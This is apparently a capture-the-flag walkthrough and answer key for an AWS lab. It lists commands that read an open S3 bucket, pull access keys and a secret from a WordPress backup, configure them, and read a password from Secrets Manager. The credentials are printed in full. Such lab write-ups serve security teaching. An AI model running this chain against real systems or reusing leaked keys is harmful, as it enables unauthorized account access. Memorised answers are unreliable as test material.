- What is the name of the S3 Bucket used to host the HR Website announcement?
ANS: images.bestfestivalcompany.com
EXPLANATION:
Step 1: Right-Click on the images and Click on Inspect Element. We will see the source of the image
2. What is the message left in the flag.txt object from that bucket?
ANS: It’s easy to get your elves data when you leave it so easy to find!
EXPLANATION:
Step 1: Type this command:
aws s3 ls s3://images.bestfestivalcompany.com/ — no-sign-request
Step 2: Open this in URL:
https://s3.amazonaws.com/images.bestfestivalcompany.com/flag.txt
3. What other file in that bucket looks interesting to you?
ANS: wp-backup.zip
EXPLANATION:
Step 1: Same step as Step 1 in Question 1
4. What is the AWS Access Key ID in that file?
ANS: AKIAQI52OJVCPZXFYAOI
EXPLANATION:
Step 1: aws s3 cp s3://images.bestfestivalcompany.com/wp-backup.zip . — no-sign-request
Step 2: unzip wp-backup.zip
Step 3: cd wp-backup.zip
Step 4: ll
Step 5: cat * | grep AKIA
5. What is the AWS Account ID that access-key works for?
ANS: 019181489476
EXPLANATION:
Step 1: less wp-config.php
Step 2: Check for the basic credentials in the file
e.g:
define(‘S3_UPLOADS_BUCKET’, ‘images.bestfestivalcompany.com’);
define(‘S3_UPLOADS_KEY’, ‘AKIAQI52OJVCPZXFYAOI’);
define(‘S3_UPLOADS_SECRET’, ‘Y+2fQBoJ+X9N0GzT4dF5kWE0ZX03n/KcYxkS1Qmc’);
define(‘S3_UPLOADS_REGION’, ‘us-east-1’);
Step 3: aws configure — profile hr
Step 4: Fill all the details, details are in Step 2
Step 5: cd .aws
Step 6: aws sts get-access-key-info — access-key-id AKIAQI52OJVCPZXFYAOI — profile hr
6. What is the Username for that access-key?
ANS: ElfMcHR@bfc.com
EXPLANATION:
Step 1: aws sts get-caller-identity — profile hr
7. There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?
ANS: HR-Portal
EXPLANATION:
Step 1: aws ec2 describe-instances — output text — profile hr
8. What is the database password stored in Secrets Manager?
ANS: Winter2021!
EXPLANATION:
Step 1: aws secretsmanager help
Step 2: aws secretsmanager list-secrets — profile hr
Step 3: aws secretsmanager get-secret-value — secret-id HR-Password — profile hr
We note that this is not the answer, we need to use a different region
Step 4: aws secretsmanager get-secret-value — secret-id HR-Password — region eu-north-1 — profile hr
*****************THANK YOU****KEEP LEARNING ******************
HOPE GUYS, THIS WALKTHROUGH MIGHT HELP YOU,IF SO LIKE THE WRITE UP ,LIKE & FOLLOW TO THE BLOG AND PROFILE WILL BE MUCH APPRECIATED
FOLLOW MY PROFILE FOR MORE WRITE-UPS
****************************PEACE********************************